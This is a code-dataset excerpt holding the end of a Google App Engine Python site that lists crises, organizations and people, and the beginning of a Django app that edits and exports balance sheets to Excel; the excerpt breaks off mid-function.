to \"orgs_index\", whose result is then used to render the page displayed using \"general.html\" \n \"\"\"\n orgs = db.GqlQuery(\"SELECT * FROM Organization ORDER BY name\")\n \n d = defaultdict(list)\n \n for org in orgs:\n d[org.name[0]].append(org)\n \n sorted_orgs = sort_dict(d)\n template_values = {'sorted_list':sorted_orgs, 'type': 'organizations'}\n \n path = os.path.join(os.path.dirname(__file__), 'html/intermediate.html')\n general_values = { 'content' : template.render(path, template_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \nclass People_Index(webapp.RequestHandler):\n \"\"\"\n People_Index is a RequestHandler class.\n This class handles the page that lists all of the people currently in our database.\n \"\"\"\n def get(self):\n \"\"\"\n Called to handle an HTTP GET request.\n Gets all of the people in our database by performing a Query. \n Sends the result to \"people_index\", whose result is then used to render the page displayed using \"general.html\" \n \"\"\"\n people = db.GqlQuery(\"SELECT * FROM Person ORDER BY name\")\n d = defaultdict(list)\n \n for person in people:\n d[person.name.split()[-1][0]].append(person)\n \n sorted_people = sort_dict(d)\n template_values = { 'sorted_list': sorted_people, 'type':'people' }\n path = os.path.join(os.path.dirname(__file__), 'html/intermediate.html')\n general_values = { 'content' : template.render(path, template_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \n \nclass Person_Page(webapp.RequestHandler): \n \"\"\"\n Person_Page is a RequestHandler class.\n This class handles the page that lists the infromation corresponding to a particular person. \n \"\"\"\n def get(self, name):\n \"\"\"\n Called to handle an HTTP GET request.\n Gets all information required by the person page template \"person.html\" from the datastore.\n Gets all related information required by the related template \"related.html\" by calling getRelatedFromPerson.\n Renders those two pages and renders the result using the general template \"general.html\".\n name is the formatted name of the Person whose information is to be displayed. \n \n \"\"\"\n s = urllib.unquote(name)\n s = s.replace('+', ' ')\n person = models.Person.get_by_key_name(s)\n path = os.path.join(os.path.dirname(__file__), 'html/person.html')\n template_values = {\"name\" : person.name,\n \"category\" : person.category,\n \"location\" : person.location, \n \"description\" : person.description, \n \"images\" : [models.Link.get(key) for key in person.images] }\n \n \n \n links_path = os.path.join(os.path.dirname(__file__), 'html/links.html') \n links_values = { \"videos\" : [models.Link.get(key) for key in person.videos],\n \"links\" : [models.Link.get(key) for key in person.links],\n \"social_networks\" : [models.Link.get(key) for key in person.social_networks] }\n \n related_path = os.path.join(os.path.dirname(__file__), 'html/related.html')\n general_values = { 'related' : template.render(related_path, getRelatedFromPerson(person) ), \n 'content' : template.render(path, template_values),\n 'links' : template.render(links_path, links_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \n \nclass Org_Page(webapp.RequestHandler): \n \"\"\"\n Org_Page is a RequestHandler class.\n This class handles the page that lists the infromation corresponding to a particular organization. \n \"\"\"\n def get(self, name):\n \"\"\"\n Called to handle an HTTP GET request.\n Gets all information required by the organizaton page template \"org.html\" from the datastore.\n Gets all related information required by the related template \"related.html\" by calling getRelatedFromOrganization.\n Renders those two pages and renders the result using the general template \"general.html\".\n name is the formatted name of the organization whose information is to be displayed. \n \n \"\"\"\n s = urllib.unquote(name)\n s = s.replace('+', ' ')\n organization = models.Organization.get_by_key_name(s)\n path = os.path.join(os.path.dirname(__file__), 'html/org.html')\n template_values = {\"name\" : organization.name,\n \"category\" : organization.category,\n \"location\" : organization.location,\n \"phone\" : organization.phone_number,\n \"history\" : organization.history,\n \"resources_needed\" : organization.resources_needed,\n \"images\" : [models.Link.get(key) for key in organization.images]}\n \n \n links_path = os.path.join(os.path.dirname(__file__), 'html/links.html') \n links_values = { \"videos\" : [models.Link.get(key) for key in organization.videos],\n \"links\" : [models.Link.get(key) for key in organization.links],\n \"social_networks\" : [models.Link.get(key) for key in organization.social_networks] }\n \n related_path = os.path.join(os.path.dirname(__file__), 'html/related.html')\n general_values = { 'related' : template.render(related_path, getRelatedFromOrganization(organization)),\n 'content' : template.render(path, template_values),\n 'links' : template.render(links_path, links_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \nclass Crisis_Page(webapp.RequestHandler): \n \"\"\"\n Crisis_Page is a RequestHandler class.\n This class handles the page that lists the infromation corresponding to a particular Crisis. \n \"\"\"\n def get(self, name):\n \"\"\"\n Called to handle an HTTP GET request.\n Gets all information required by the crisis page template \"crisis.html\" from the datastore.\n Gets all related information required by the related template \"related.html\" by calling getRelatedFromCrisis.\n Renders those two pages and renders the result using the general template \"general.html\".\n name is the formatted name of the crisis whose information is to be displayed. \n \n \"\"\"\n s = urllib.unquote(name)\n s = s.replace('+', ' ')\n crisis = models.Crisis.get_by_key_name(s)\n path = os.path.join(os.path.dirname(__file__), 'html/crisis.html')\n template_values = { \"description\": crisis.description, \n \"name\" : crisis.name, \n \"location\" : crisis.location,\n \"date\" : crisis.date, \n \"human_impact\" : crisis.human_impact, \n \"economic_impact\" : crisis.economic_impact,\n \"category\" : crisis.category, \n \"resources_needed\" : crisis.resources_needed, \n \"ways_to_help\" : crisis.ways_to_help,\n \"images\" : [models.Link.get(key) for key in crisis.images] }\n\n related_path = os.path.join(os.path.dirname(__file__), 'html/related.html')\n \n links_path = os.path.join(os.path.dirname(__file__), 'html/links.html') \n links_values = { \"videos\" : [models.Link.get(key) for key in crisis.videos],\n \"links\" : [models.Link.get(key) for key in crisis.links],\n \"social_networks\" : [models.Link.get(key) for key in crisis.social_networks] }\n \n general_values = { 'related' : template.render(related_path, getRelatedFromCrisis(crisis)),\n 'content' : template.render(path, template_values),\n 'links' : template.render(links_path, links_values) }\n\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \nclass Search_Page(webapp.RequestHandler):\n \"\"\"\n Search_Page is a RequestHandler class.\n This class handles the page that handles the search feature. \n \"\"\"\n \n def get(self):\n table_path = os.path.join(os.path.dirname(__file__), 'html/table.html')\n general_values = { 'content' : template.render(table_path, {\"search_term\": cgi.escape(self.request.get('search_term')), \n \"results\": [] } )} \n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n\n def post(self):\n table_path = os.path.join(os.path.dirname(__file__), 'html/table.html')\n general_values = { 'content' : template.render(table_path, {\"search_term\": cgi.escape(self.request.get('search_term')), \n \"results\": get_results(self.request.get('search_term'))} )} \n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n\nclass XML(webapp.RequestHandler):\n \"\"\"\n XML is a RequestHandler class.\n This class handles the page that displays the information in our database as XML. It is used when we export our data.. \n \"\"\"\n def get(self):\n w = StringIO.StringIO()\n create_XML(w)\n self.response.headers['Content-Type']='text/xml; charset=utf_8'\n self.response.out.write( w.getvalue() )\n w.close()\n\n\napplication = webapp.WSGIApplication(\n [('/', MainPage),\n ('/io', IO),\n ('/export.xml', XML),\n ('/crises/(.+)', Crisis_Page),\n ('/organizations/(.+)', Org_Page),\n ('/people/(.+)', Person_Page),\n ('/crises/', Crises_Index),\n ('/organizations/', Orgs_Index),\n ('/people/', People_Index),\n ('/search', Search_Page)], \n debug=True)\n\n \n \ndef sort_dict(d):\n \"\"\"\n takes a dictionary, and sorts it into a list of key,value tuples sorted by key)\n dictionary is a dictionary we plan to sort\n return sorted_dict, a list of tuples sorted by the first value in the tuple (the key gathered from the dictionary)\n \"\"\"\n sorted_dict = []\n for key,value in d.items():\n sorted_dict.append((key, value))\n return sorted(sorted_dict)\n\n \n\ndef main():\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main() \n","sub_path":"wc1.py","file_name":"wc1.py","file_ext":"py","file_size_in_byte":15391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"553978518","text":"#coding=utf-8\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, render_to_response\nfrom django.template import RequestContext\nfrom LoginRegister.models import usertable\nfrom UserManage.models import commenttable, balancesheet, cashflow, incomestatement\nimport re\nimport time\nimport datetime\nimport os\nfrom xlwt import*\nimport xlwt\n\nformbalancesheet = [\"流动资产:\", \"流动负债:\", \"货币资金\", \"短期借款\",\\\n \"交易性金融资产\", \"交易性金融负债\", \"应收票据\", \"应付票据\", \"应收账款\",\\\n \"应付账款\", \"预付款项\", \"预收款项\", \"应收利息\", \"应付职工薪酬\", \"应收股利\",\\\n \"应交税费\" , \"其他应收款\", \"应付利息\", \"存货\", \"应付股利\", \"一年内到期的非流动资产\",\\\n \"其他应付款\", \"其他流动资产\", \"一年内到期的非流动负债\", \"\", \"其他流动负债\",\\\n \"流动资产合计\", \"流动负债合计\", \"非流动资产:\", \"非流动负债:\", \"可供出售金融资产\",\\\n \"长期借款\", \"持有至到期投资\", \"应付债券\", \"长期应收款\", \"长期应付款\", \"长期股权投资\",\\\n \"专项应付款\", \"投资性房地产\", \"预计负债\", \"固定资产\", \"递延所得税负债\",\\\n \"减:累计折旧\", \"其他非流动负债\", \"固定资产净值\", \"非流动负债合计\",\"减:固定资产减值准备\",\\\n \"负债合计\", \"固定资产净额\", \"\", \"在建工程\", \"所有者权益(或股东权益):\", \"工程物资\",\\\n \"实收资本(或股本)\", \"固定资产清理\", \"资本公积\", \"生产性生物资产\", \"减:库存股\",\\\n \"无形资产\", \"专项储备\", \"无形资产\", \"盈余公积\", \"商誉\", \"未分配利润\", \"长期待摊费用\",\\\n \"所有者权益(或股东权益)合计\", \"递延所得税资产\", \"\", \"其他非流动资产\", \"\",\\\n \"非流动资产合计\", \"\", \"资产总计\", \"负债和所有者权益(或股东权益)合计\"]\n \ndef exportbalancesheetexcel(request, userid, sheetid):\n username = usertable.objects.get(userid=userid).username\n results = balancesheet.objects.filter(user=userid)\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":int(sheetid) })\n\ndef exportbalancesheettopath(request):\n userid = request.POST.get(\"userid\", '')\n sheetid = request.POST.get(\"sheetid\", '')\n path = request.POST.get(\"path\", '')\n balasheet = balancesheet.objects.get(id=sheetid)\n\n\n if os.path.exists(path):\n return HttpResponse(path+\" exists.\")\n else:\n pattern = re.compile(r'.+\\.xls$')\n if not pattern.search(path):\n return HttpResponse(\"Please input the file ended with '.xls'.\")\n else:\n workbook = Workbook(encoding='utf-8') #改变编码用于显示中文\n \n al = xlwt.Alignment()\n al.horz = Alignment.HORZ_CENTER\n \n fnt = Font()\n fnt.bold = True\n fnt.height = 250\n \n fnt2 = Font()\n fnt2.bold = True\n fnt2.height = 350\n \n fnt3 = Font()\n fnt3.bold = True\n \n style = XFStyle()\n style.alignment = al\n style.font = fnt\n \n style2 = XFStyle()\n style2.alignment = al\n style2.font = fnt2\n \n style3 = XFStyle()\n style3.font = fnt3\n \n style4 = XFStyle()\n style4.alignment = al\n \n sheet = workbook.add_sheet(\"sheet1\")\n sheet.panes_frozen=True\n sheet.horz_split_pos=3 #行冻结\n sheet.write_merge(0,0,0,5,'资产负债表', style2)\n #sheet.row(2).set_style(style)\n sheet.write(2,0,'资产', style)\n sheet.write(2,1,'年初余额', style)\n sheet.write(2,2,'期末余额', style)\n sheet.write(2,3,'负债和所有者权益(或股东权益)', style)\n sheet.write(2,4,'年初余额', style)\n sheet.write(2,5,'期末余额', style)\n # print len(column)\n sheet.write(1,0,'编制单位:', style)\n sheet.write_merge(1,1,1,2,balasheet.unit, style)\n sheet.write(1,3,'时间:', style)\n time1 = str(balasheet.date)\n sheet.write_merge(1,1,4,5,time1, style)\n \n for i in range(0,len(formbalancesheet)/2):\n if(i in [13,22,24,35,36]):\n sheet.write(3+i,0,formbalancesheet[2*i], style3)\n else:\n sheet.write(3+i,0,formbalancesheet[2*i])\n \n if(i in [13,22,23,32,36]):\n sheet.write(3+i,3,formbalancesheet[2*i+1], style3)\n else:\n sheet.write(3+i,3,formbalancesheet[2*i+1])\n\n if(balasheet.a5):\n sheet.write(4,1,balasheet.a5, style4)\n if(balasheet.a6):\n sheet.write(4,2,balasheet.a6, style4)\n if(balasheet.a7):\n sheet.write(4,4,balasheet.a7, style4)\n if(balasheet.a8):\n sheet.write(4,5,balasheet.a8, style4)\n if(balasheet.a9):\n sheet.write(5,1,balasheet.a9, style4)\n if(balasheet.a10):\n sheet.write(5,2,balasheet.a10, style4)\n if(balasheet.a11):\n sheet.write(5,4,balasheet.a11, style4)\n if(balasheet.a12):\n sheet.write(5,5,balasheet.a12, style4)\n if(balasheet.a13):\n sheet.write(6,1,balasheet.a13, style4)\n if(balasheet.a14):\n sheet.write(6,2,balasheet.a14, style4)\n if(balasheet.a15):\n sheet.write(6,4,balasheet.a15, style4)\n if(balasheet.a16):\n sheet.write(6,5,balasheet.a16, style4)\n if(balasheet.a17):\n sheet.write(7,1,balasheet.a17, style4)\n if(balasheet.a18):\n sheet.write(7,2,balasheet.a18, style4)\n if(balasheet.a19):\n sheet.write(7,4,balasheet.a19, style4)\n if(balasheet.a20):\n sheet.write(7,5,balasheet.a20, style4)\n if(balasheet.a21):\n sheet.write(8,1,balasheet.a21, style4)\n if(balasheet.a22):\n sheet.write(8,2,balasheet.a22, style4)\n if(balasheet.a23):\n sheet.write(8,4,balasheet.a23, style4)\n if(balasheet.a24):\n sheet.write(8,5,balasheet.a24, style4)\n if(balasheet.a25):\n sheet.write(9,1,balasheet.a25, style4)\n if(balasheet.a26):\n sheet.write(9,2,balasheet.a26, style4)\n if(balasheet.a27):\n sheet.write(9,4,balasheet.a27, style4)\n if(balasheet.a28):\n sheet.write(9,5,balasheet.a28, style4)\n if(balasheet.a29):\n sheet.write(10,1,balasheet.a29, style4)\n if(balasheet.a30):\n sheet.write(10,2,balasheet.a30, style4)\n if(balasheet.a31):\n sheet.write(10,4,balasheet.a31, style4)\n if(balasheet.a32):\n sheet.write(10,5,balasheet.a32, style4)\n if(balasheet.a33):\n sheet.write(11,1,balasheet.a33, style4)\n if(balasheet.a34):\n sheet.write(11,2,balasheet.a34, style4)\n if(balasheet.a35):\n sheet.write(11,4,balasheet.a35, style4)\n if(balasheet.a36):\n sheet.write(11,5,balasheet.a36, style4)\n if(balasheet.a37):\n sheet.write(12,1,balasheet.a37, style4)\n if(balasheet.a38):\n sheet.write(12,2,balasheet.a38, style4)\n if(balasheet.a39):\n sheet.write(12,4,balasheet.a39, style4)\n if(balasheet.a40):\n sheet.write(12,5,balasheet.a40, style4)\n if(balasheet.a41):\n sheet.write(13,1,balasheet.a41, style4)\n if(balasheet.a42):\n sheet.write(13,2,balasheet.a42, style4)\n if(balasheet.a43):\n sheet.write(13,4,balasheet.a43, style4)\n if(balasheet.a44):\n sheet.write(13,5,balasheet.a44, style4)\n if(balasheet.a45):\n sheet.write(14,1,balasheet.a45, style4)\n if(balasheet.a46):\n sheet.write(14,2,balasheet.a46, style4)\n if(balasheet.a47):\n sheet.write(14,4,balasheet.a47, style4)\n if(balasheet.a48):\n sheet.write(14,5,balasheet.a48, style4)\n if(balasheet.a49):\n sheet.write(15,4,balasheet.a49, style4)\n if(balasheet.a50):\n sheet.write(15,5,balasheet.a50, style4)\n sheet.write(16,1,balasheet.SUMB1, style4)\n sheet.write(16,2,balasheet.SUMC1, style4)\n sheet.write(16,4,balasheet.SUME1, style4)\n sheet.write(16,5,balasheet.SUMF1, style4)\n if(balasheet.a55):\n sheet.write(18,1,balasheet.a55, style4)\n if(balasheet.a56):\n sheet.write(18,2,balasheet.a56, style4)\n if(balasheet.a57):\n sheet.write(18,4,balasheet.a57, style4)\n if(balasheet.a58):\n sheet.write(18,5,balasheet.a58, style4)\n if(balasheet.a59):\n sheet.write(19,1,balasheet.a59, style4)\n if(balasheet.a60):\n sheet.write(19,2,balasheet.a60, style4)\n if(balasheet.a61):\n sheet.write(19,4,balasheet.a61, style4)\n if(balasheet.a62):\n sheet.write(19,5,balasheet.a62, style4)\n if(balasheet.a63):\n sheet.write(20,1,balasheet.a63, style4)\n if(balasheet.a64):\n sheet.write(20,2,balasheet.a64, style4)\n if(balasheet.a65):\n sheet.write(20,4,balasheet.a65, style4)\n if(balasheet.a66):\n sheet.write(20,5,balasheet.a66, style4)\n if(balasheet.a67):\n sheet.write(21,1,balasheet.a67, style4)\n if(balasheet.a68):\n sheet.write(21,2,balasheet.a68, style4)\n if(balasheet.a69):\n sheet.write(21,4,balasheet.a69, style4)\n if(balasheet.a70):\n sheet.write(21,5,balasheet.a70, style4)\n if(balasheet.a71):\n sheet.write(22,1,balasheet.a71, style4)\n if(balasheet.a72):\n sheet.write(22,2,balasheet.a72, style4)\n if(balasheet.a73):\n sheet.write(22,4,balasheet.a73, style4)\n if(balasheet.a74):\n sheet.write(22,5,balasheet.a74, style4)\n if(balasheet.a75):\n sheet.write(23,1,balasheet.a75, style4)\n if(balasheet.a76):\n sheet.write(23,2,balasheet.a76, style4)\n if(balasheet.a77):\n sheet.write(23,4,balasheet.a77, style4)\n if(balasheet.a78):\n sheet.write(23,5,balasheet.a78, style4)\n if(balasheet.a79):\n sheet.write(24,1,balasheet.a79, style4)\n if(balasheet.a80):\n sheet.write(24,2,balasheet.a80, style4)\n if(balasheet.a81):\n sheet.write(24,4,balasheet.a81, style4)\n if(balasheet.a82):\n sheet.write(24,5,balasheet.a82, style4)\n \n sheet.write(25,1,balasheet.SUBB1, style4)\n sheet.write(25,2,balasheet.SUBC1, style4)\n sheet.write(25,4,balasheet.SUME2, style4)\n sheet.write(25,5,balasheet.SUMF2, style4)\n if(balasheet.a83):\n sheet.write(26,1,balasheet.a83, style4)\n if(balasheet.a84):\n sheet.write(26,2,balasheet.a84, style4)\n sheet.write(26,4,balasheet.SUME3, style4)\n sheet.write(26,5,balasheet.SUMF3, style4)\n \n \n sheet.write(27,1,balasheet.SUBB2, style4)\n sheet.write(27,2,balasheet.SUBC2, style4)\n \n if(balasheet.a85):\n sheet.write(28,1,balasheet.a85, style4)\n if(balasheet.a86):\n sheet.write(28,2,balasheet.a86, style4)\n if(balasheet.a87):\n sheet.write(27+1,4,balasheet.a87, style4)\n if(balasheet.a88):\n sheet.write(27+1,5,balasheet.a88, style4)\n if(balasheet.a89):\n sheet.write(28+1,1,balasheet.a89, style4)\n if(balasheet.a90):\n sheet.write(28+1,2,balasheet.a90, style4)\n if(balasheet.a91):\n sheet.write(28+1,4,balasheet.a91, style4)\n if(balasheet.a92):\n sheet.write(28+1,5,balasheet.a92, style4)\n if(balasheet.a93):\n sheet.write(29+1,1,balasheet.a93, style4)\n if(balasheet.a94):\n sheet.write(29+1,2,balasheet.a94, style4)\n if(balasheet.a95):\n sheet.write(29+1,4,balasheet.a95, style4)\n if(balasheet.a96):\n sheet.write(29+1,5,balasheet.a96, style4)\n if(balasheet.a97):\n sheet.write(30+1,1,balasheet.a97, style4)\n if(balasheet.a98):\n sheet.write(30+1,2,balasheet.a98, style4)\n if(balasheet.a99):\n sheet.write(30+1,4,balasheet.a99, style4)\n if(balasheet.a100):\n sheet.write(30+1,5,balasheet.a100, style4)\n if(balasheet.a101):\n sheet.write(31+1,1,balasheet.a101, style4)\n if(balasheet.a102):\n sheet.write(31+1,2,balasheet.a102, style4)\n if(balasheet.a103):\n sheet.write(31+1,4,balasheet.a103, style4)\n if(balasheet.a104):\n sheet.write(31+1,5,balasheet.a104, style4)\n if(balasheet.a105):\n sheet.write(32+1,1,balasheet.a105, style4)\n if(balasheet.a106):\n sheet.write(32+1,2,balasheet.a106, style4)\n if(balasheet.a107):\n sheet.write(32+1,4,balasheet.a107, style4)\n if(balasheet.a108):\n sheet.write(32+1,5,balasheet.a108, style4)\n if(balasheet.a109):\n sheet.write(33+1,1,balasheet.a109, style4)\n if(balasheet.a110):\n sheet.write(33+1,2,balasheet.a110, style4)\n if(balasheet.a111):\n sheet.write(33+1,4,balasheet.a111, style4)\n if(balasheet.a112):\n sheet.write(33+1,5,balasheet.a112, style4)\n if(balasheet.a113):\n sheet.write(34+1,1,balasheet.a113, style4)\n if(balasheet.a114):\n sheet.write(34+1,2,balasheet.a114, style4)\n sheet.write(35,4,balasheet.SUME4, style4)\n sheet.write(35,5,balasheet.SUMF4, style4)\n if(balasheet.a115):\n sheet.write(36,1,balasheet.a115, style4)\n if(balasheet.a116):\n sheet.write(36,2,balasheet.a116, style4)\n if(balasheet.a117):\n sheet.write(37,1,balasheet.a117, style4)\n if(balasheet.a118):\n sheet.write(37,2,balasheet.a118, style4)\n sheet.write(38,1,balasheet.SUMB2, style4)\n sheet.write(38,2,balasheet.SUMC2, style4)\n sheet.write(39,1,balasheet.SUMB3, style4)\n sheet.write(39,2,balasheet.SUMC3, style4)\n sheet.write(39,4,balasheet.SUME5, style4)\n sheet.write(39,5,balasheet.SUMF5, style4)\n \n sheet.col(0).width = 256*36\n sheet.col(1).width = 256*16\n sheet.col(2).width = 256*16\n sheet.col(3).width = 256*40\n sheet.col(4).width = 256*16\n sheet.col(5).width = 256*16\n \n \n workbook.save(path)\n username = usertable.objects.get(userid=userid).username\n results = balancesheet.objects.filter(user=userid)\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":-1, \"isexport\":1 })\n\ndef editbalancesheet(request, userid, sheetid):\n username = usertable.objects.get(userid=userid).username\n sheet = balancesheet.objects.get(id=sheetid)\n return render(request, \"AddBalanceSheet.html\", {\"sheetid\":sheetid, \"isupdate\":1, \"userid\":userid, \\\n \"username\":username, \\\n \"unit\":sheet.unit, \\\n 'v5':sheet.a5, 'v6':sheet.a6, \\\n 'v7':sheet.a7, 'v8':sheet.a8, 'v9':sheet.a9, \\\n 'v10':sheet.a10, 'v11':sheet.a11, 'v12':sheet.a12, \\\n 'v13':sheet.a13, 'v14':sheet.a14, 'v15':sheet.a15, \\\n 'v16':sheet.a16, 'v17':sheet.a17, 'v18':sheet.a18, \\\n 'v19':sheet.a19, 'v20':sheet.a20, 'v21':sheet.a21, \\\n 'v22':sheet.a22, 'v23':sheet.a23, 'v24':sheet.a24, \\\n 'v25':sheet.a25, 'v26':sheet.a26, 'v27':sheet.a27, \\\n 'v28':sheet.a28, 'v29':sheet.a29, 'v30':sheet.a30, \\\n 'v31':sheet.a31, 'v32':sheet.a32, 'v33':sheet.a33, \\\n 'v34':sheet.a34, 'v35':sheet.a35, 'v36':sheet.a36, \\\n 'v37':sheet.a37, 'v38':sheet.a38, 'v39':sheet.a39, \\\n 'v40':sheet.a40, 'v41':sheet.a41, 'v42':sheet.a42, \\\n 'v43':sheet.a43, 'v44':sheet.a44, 'v45':sheet.a45, \\\n 'v46':sheet.a46, 'v47':sheet.a47, 'v48':sheet.a48, \\\n 'v49':sheet.a49, 'v50':sheet.a50, \\\n 'v55':sheet.a55, 'v56':sheet.a56, 'v57':sheet.a57, \\\n 'v58':sheet.a58, 'v59':sheet.a59, 'v60':sheet.a60, \\\n 'v61':sheet.a61, 'v62':sheet.a62, 'v63':sheet.a63, \\\n 'v64':sheet.a64, 'v65':sheet.a65, 'v66':sheet.a66, \\\n 'v67':sheet.a67, 'v68':sheet.a68, 'v69':sheet.a69, \\\n 'v70':sheet.a70, 'v71':sheet.a71, 'v72':sheet.a72, \\\n 'v73':sheet.a73, 'v74':sheet.a74, 'v75':sheet.a75, \\\n 'v76':sheet.a76, 'v77':sheet.a77, 'v78':sheet.a78, \\\n 'v79':sheet.a79, 'v80':sheet.a80, 'v81':sheet.a81, \\\n 'v82':sheet.a82, 'v83':sheet.a83, 'v84':sheet.a84, \\\n 'v85':sheet.a85, 'v86':sheet.a86, 'v87':sheet.a87, \\\n 'v88':sheet.a88, 'v89':sheet.a89, 'v90':sheet.a90, \\\n 'v91':sheet.a91, 'v92':sheet.a92, 'v93':sheet.a93, \\\n 'v94':sheet.a94, 'v95':sheet.a95, 'v96':sheet.a96, \\\n 'v97':sheet.a97, 'v98':sheet.a98, 'v99':sheet.a99, \\\n 'v100':sheet.a100, 'v101':sheet.a101, 'v102':sheet.a102, \\\n 'v103':sheet.a103, 'v104':sheet.a104, 'v105':sheet.a105, \\\n 'v106':sheet.a106, 'v107':sheet.a107, 'v108':sheet.a108, \\\n 'v109':sheet.a109, 'v110':sheet.a110, 'v111':sheet.a111, \\\n 'v112':sheet.a112, 'v113':sheet.a113, 'v114':sheet.a114, \\\n 'v115':sheet.a115, 'v116':sheet.a116, 'v117':sheet.a117, \\\n 'v118':sheet.a118\n })\n\ndef addbalancesheet(request, userid):\n username = usertable.objects.get(userid=userid).username\n return render(request, \"AddBalanceSheet.html\", {\"userid\":userid, \\\n \"username\":username, \"isupdate\":0})\n\ndef listbalancesheet(request, userid, flag):\n username = usertable.objects.get(userid=userid).username\n flag = int(flag)\n if(flag == 1):\n results = balancesheet.objects.filter(user=userid).order_by(\"-date\")\n if(flag == 2):\n results = balancesheet.objects.filter(user=userid).order_by(\"date\")\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":-1 })\n\ndef displaybalancesheet(request, userid, sheetid):\n username = usertable.objects.get(userid=userid).username\n sheet = balancesheet.objects.get(id=sheetid)\n return render(request, \"DisplayBalanceSheet.html\", {\"username\":username, \\\n \"userid\":userid, \"sheet\":sheet})\n\ndef deletebalancesheet(request, userid, sheetid):\n p = balancesheet.objects.get(id=sheetid)\n p.delete()\n username = usertable.objects.get(userid=userid).username\n results = balancesheet.objects.filter(user=userid)\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":-1, \"isdelete\":1 })\n\ndef updatebalancesheet(request):\n userid = request.POST.get(\"userid\", '')\n sheetid = request.POST.get(\"sheetid\", '')\n \n unit = request.POST.get('unit', '')\n if unit == '':\n unit = ''\n a5 = request.POST.get('a5', '')\n if a5 == '':\n a5 = 0\n else:\n a5 = float(a5)\n a6 = request.POST.get('a6', '')\n if a6 == '':\n a6 = 0\n else:\n a6 = float(a6)\n a7 = request.POST.get('a7', '')\n if a7 == '':\n a7 = 0\n else:\n a7 = float(a7)\n a8 = request.POST.get('a8', '')\n if a8 == '':\n a8 = 0\n else:\n a8 = float(a8)\n a9 = request.POST.get('a9', '')\n if a9 == '':\n a9 = 0\n else:\n a9 = float(a9)\n a10 = request.POST.get('a10', '')\n if a10 == '':\n a10 = 0\n else:\n a10 = float(a10)\n a11 = request.POST.get('a11', '')\n if a11 == '':\n a11 = 0\n else:\n a11 = float(a11)\n a12 = request.POST.get('a12', '')\n if a12 == '':\n a12 = 0\n else:\n a12 = float(a12)\n a13 = request.POST.get('a13', '')\n if a13 == '':\n a13 = 0\n else:\n a13 = float(a13)\n a14 = request.POST.get('a14', '')\n if a14 == '':\n a14 = 0\n else:\n a14 = float(a14)\n a15 = request.POST.get('a15', '')\n if a15 == '':\n a15 = 0\n else:\n a15 = float(a15)\n a16 = request.POST.get('a16', '')\n if a16 == '':\n a16 = 0\n else:\n a16 = float(a16)\n a17 = request.POST.get('a17', '')\n if a17 == '':\n a17 = 0\n else:\n a17 = float(a17)\n a18 = request.POST.get('a18', '')\n if a18 == '':\n a18 = 0\n else:\n a18 = float(a18)\n a19 = request.POST.get('a19', '')\n if a19 == '':\n a19 = 0\n else:\n a19 = float(a19)\n a20 = request.POST.get('a20', '')\n if a20 == '':\n a20 = 0\n else:\n a20 = float(a20)\n a21 = request.POST.get('a21', '')\n if a21 == '':\n a21 = 0\n else:\n a21 = float(a21)\n a22 = request.POST.get('a22', '')\n if a22 == '':\n a22 = 0\n else:\n a22 = float(a22)\n a23 = request.POST.get('a23', '')\n if a23 == '':\n a23 = 0\n else:\n a23 = float(a23)\n a24 = request.POST.get('a24', '')\n if a24 == '':\n a24 = 0\n else:\n a24 = float(a24)\n a25 = request.POST.get('a25', '')\n if a25 == '':\n a25 = 0\n else:\n a25 = float(a25)\n a26 = request.POST.get('a26', '')\n if a26 == '':\n a26 = 0\n else:\n a26 = float(a26)\n a27 = request.POST.get('a27', '')\n if a27 == '':\n a27 = 0\n else:\n a27 = float(a27)\n a28 = request.POST.get('a28', '')\n if a28 == '':\n a28 = 0\n else:\n a28 = float(a28)\n a29 = request.POST.get('a29', '')\n if a29 == '':\n a29 = 0\n else:\n a29 = float(a29)\n a30 = request.POST.get('a30', '')\n if a30 == '':\n a30 = 0\n else:\n a30 = float(a30)\n a31 = request.POST.get('a31', '')\n if a31 == '':\n a31 = 0\n else:\n a31 = float(a31)\n a32 = request.POST.get('a32', '')\n if a32 == '':\n a32 = 0\n else:\n a32 = float(a32)\n a33 = request.POST.get('a33', '')\n if a33 == '':\n a33 = 0\n else:\n a33 = float(a33)\n a34 = request.POST.get('a34', '')\n if a34 == '':\n a34 = 0\n else:\n a34 = float(a34)\n a35 = request.POST.get('a35', '')\n if a35 == '':\n a35 = 0\n else:\n a35 = float(a35)\n a36 = request.POST.get('a36', '')\n if a36 == '':\n a36 = 0\n else:\n a36 = float(a36)\n a37 = request.POST.get('a37', '')\n if a37 == '':\n a37 = 0\n else:\n a37 = float(a37)\n a38 = request.POST.get('a38', '')\n if a38 == '':\n a38 = 0\n else:\n a38 = float(a38)\n a39 = request.POST.get('a39', '')\n if a39 == '':\n a39 = 0\n else:\n a39 = float(a39)\n a40 = request.POST.get('a40', '')\n if a40 == '':\n a40 = 0\n else:\n a40 = float(a40)\n a41 = request.POST.get('a41', '')\n if a41 == '':\n a41 = 0\n else:\n a41 = float(a41)\n a42 = request.POST.get('a42', '')\n if a42 == '':\n a42 = 0\n else:\n a42 = float(a42)\n a43 = request.POST.get('a43', '')\n if a43 == '':\n a43 = 0\n else:\n a43 = float(a43)\n a44 = request.POST.get('a44', '')\n if a44 == '':\n a44 = 0\n 